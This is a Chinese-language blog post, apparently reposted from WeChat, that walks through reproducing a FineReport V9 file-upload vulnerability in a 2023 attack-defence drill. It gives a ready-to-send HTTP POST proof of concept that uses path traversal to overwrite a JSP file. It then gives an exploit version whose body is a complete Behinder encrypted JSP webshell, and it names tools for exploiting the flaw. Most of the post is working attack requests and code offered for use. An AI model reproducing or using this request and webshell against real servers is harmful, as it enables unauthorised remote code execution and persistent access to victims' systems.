请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
这个漏洞爆出的时间相对来说比较久了,但在近期的攻防演练中还是起到了出乎意料的效果,比较统一的描述是此漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 JSP 文件进行覆盖,寻找Tomcat 启动帆软后默认存在的 JSP 文件。
POC如下所示:POST /seeyonreport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../WebReport/shell.jsp HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)Accept: */*Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: text/xml;charset=UTF-8Cache-Control: no-cachePragma: no-cacheHost: x.x.x.xContent-Length: 75{"__CONTENT__":"<%out.println("Hello World!");%>", "__CHARSET__": "UTF-8"}
EXP如下所示:即将payload换成冰蝎马POST /seeyonreport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../WebReport/shell.jsp HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)Accept: */*Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: text/xml;charset=UTF-8Cache-Control: no-cachePragma: no-cacheHost: x.x.x.xContent-Length: 75{"__CONTENT__": "<%@page import="java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*" %><%! private byte[] Decrypt(byte[] data) throws Exception { String k="e45e329feb5d925b"; javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");c.init(2,new javax.crypto.spec.SecretKeySpec(k.getBytes(),"AES")); byte[] decodebs; Class baseCls ; try{ baseCls=Class.forName("java.util.Base64"); Object Decoder=baseCls.getMethod("getDecoder", null).invoke(baseCls, null); decodebs=(byte[]) Decoder.getClass().getMethod("decode", new Class[]{byte[].class}).invoke(Decoder, new Object[]{data}); } catch (Throwable e) { System.out.println("444444"); baseCls = Class.forName("sun.misc.BASE64Decoder"); Object Decoder=baseCls.newInstance(); decodebs=(byte[]) Decoder.getClass().getMethod("decodeBuffer",new Class[]{String.class}).invoke(Decoder, new Object[]{new String(data)}); } return c.doFinal(decodebs); } %><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){ ByteArrayOutputStream bos = new ByteArrayOutputStream(); byte[] buf = new byte[512]; int length=request.getInputStream().read(buf); while (length>0) { byte[] data= Arrays.copyOfRange(buf,0,length); bos.write(data); length=request.getInputStream().read(buf); } new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);} %>", "__CHARSET__": "UTF-8"}
1.APT-tools2.Exp-Tools V1.2.0 By: CSeroad && 境心
使用部分截图:
使用冰蝎连接,查看权限:
过程简单,大佬勿喷!
原文始发于微信公众号(爱喝酒烫头的曹操):2023 HW实战-帆软V9文件上传漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论